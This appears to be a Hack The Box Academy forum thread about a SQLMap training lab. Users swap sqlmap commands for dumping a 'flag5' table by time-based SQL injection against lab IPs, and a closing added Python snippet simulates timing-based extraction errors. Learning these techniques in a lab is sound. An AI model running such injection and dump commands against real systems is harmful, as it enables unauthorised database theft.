SQLMap essentials - case #5 flag

Hey,
I am currently on case #5 in the SQLMap Essentials room. I found the injection and most of the flag, but can’t get the full flag. The hint says to run the command a few times to get the correct result, but no matter how many times I ran it and changed commands, it didn’t help.

The command I run:
sqlmap -u http://157.245.33.77:30661/case5.php?id=1

What should I do?
Thanks

SOLUTION:
I restarted the target and it worked. If you get a flag that ends with 9, change it to ‘7}’ and that’s it.

1 Like

Hey man, I am also getting an error. I’ve restarted the target many times and the table dumps, but it looks like it could be an HTB issue.

I restarted the machine like 10 times until I got the right flag, HTB should fix it

2 Likes

In my case I had to substitute the character ` for _ that was in my flag and it worked.

Hi, I tried the command and it gives me error content in the flag5 table dump, I guess. Any help?

Use the OR condition, with --batch --dump

I recommend everyone watch the “Cybr” video explaining sqlmap’s Risk and Level options.

1 Like

Getting the answer is easier than you think:
1. Intercept the request with Burp Suite
2. Execute sqlmap -r case5.txt --no-cast -T flag5 --batch --dump
In this case, neither --risk nor --level is necessary.

1 Like

If you get a “blank”, restart the box; it’s still an issue.

1 Like

I don’t get it. I tried these commands:

sqlmap -u http://94.237.54.170:58561/case5.php?id=1 --no-cast --dump -T flag5 --level=5 --risk=3

sqlmap -u http://94.237.54.170:58561/case5.php?id=1 --no-cast --batch --dump -T flag5 --level=5 --risk=3

I do actually get the flag for table flag5, but HTB tells me it’s the wrong answer

  1. Need to try many times. The outputs are not reliable. Sqlmap gives me flags 5 with minor differences.
  2. May need to reset the target
  3. Need to delete the output folder and try again.

Finally, it works!

I would like to share my experience; hopefully it will help those who struggle like me. I ran it for 2 days on my laptop, and it never worked. I switched to the Hack The Box Academy Parrot Attack Box, and it worked on the first try.

1 Like

This pretty much explains it. Using the Pwnbox would have the least latency. You just have to repeat the right commands and remove the saved output so it doesn’t continue from previous sessions.

1 Like

Man, this question drove me insane. Turns out the seconds to delay the DBMS response need to be increased to 10 secs because the box is so laggy! Here is the cmd that worked for me; hope it helps the rest of you guys who probably have the correct answer, just minus the secs delay parameter.

sqlmap -u "94.237.63.201:50727/case5.php?id=1" --batch --dump -T flag5 -D testdb --no-cast --dbms=MySQL --technique=T --time-sec=10 --level=5 --risk=3 --fresh-queries

Also, restarting the box is advisable, and increase the “time-sec” param if the system says your flag is incorrect, as the format it returns is sometimes garbled. Took me like 1 hour for it to decode correctly.

To make this easier and faster.

First run the command below to create a cached session.

sqlmap -u http://<IP>:<PORT>/case5.php?id=1 -T flag5 -D testdb --level 5 --risk 3 --batch --dump

If you’re lucky, you will already have found the flag in the result.

If not, run the second command below, which refreshes the queries. This will be faster since we already have the cached session from the previous run.

sqlmap -u http://<IP>:<PORT>/case5.php?id=1 -T flag5 -D testdb --level 5 --risk 3 --batch --dump --fresh-queries --threads=10

In that second command the threads are set to 10, so it’s much faster to retrieve and finish the time-based injection. Faster retrieval in time-based means fewer errors in the retrieved data.

You can run the second query as many times as you like until you retrieve the whole correct data.
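
Added example, not part of any post above and not sqlmap's own decision logic: a local simulation (no network traffic) of why time-based retrieval returns flags "with minor differences" on a laggy target, and why a larger --time-sec value stabilises the result. The secret, the latency model and all function names are constructed assumptions.

```python
import random

SECRET = "HTB{constructed_sample}"  # constructed value, not a real flag
BASE_LATENCY = 0.05                 # assumed round trip in seconds

def response_time(condition_true, delay, jitter, rng):
    """Simulated response: base latency, random lag, plus the delay if the tested condition holds."""
    lag = rng.expovariate(1.0 / jitter) if jitter > 0 else 0.0
    return BASE_LATENCY + lag + (delay if condition_true else 0.0)

def extract(secret, delay, jitter, seed):
    """Recover each character by bisection, reading every answer from timing alone."""
    rng = random.Random(seed)
    out = []
    for ch in secret:
        lo, hi = 32, 126  # printable ASCII
        while lo < hi:
            mid = (lo + hi) // 2
            # A response at least `delay` seconds long is read as "true".
            if response_time(ord(ch) > mid, delay, jitter, rng) >= delay:
                lo = mid + 1   # a lag spike on a "false" answer lands here by mistake
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)

def wrong_chars(delay, jitter, runs=20):
    """Total characters recovered incorrectly over `runs` simulated sessions."""
    return sum(
        sum(a != b for a, b in zip(extract(SECRET, delay, jitter, seed), SECRET))
        for seed in range(runs)
    )

if __name__ == "__main__":
    for delay in (1, 5, 10):
        print(f"delay={delay:>2}s  wrong chars in 20 runs: {wrong_chars(delay, jitter=0.5)}")
```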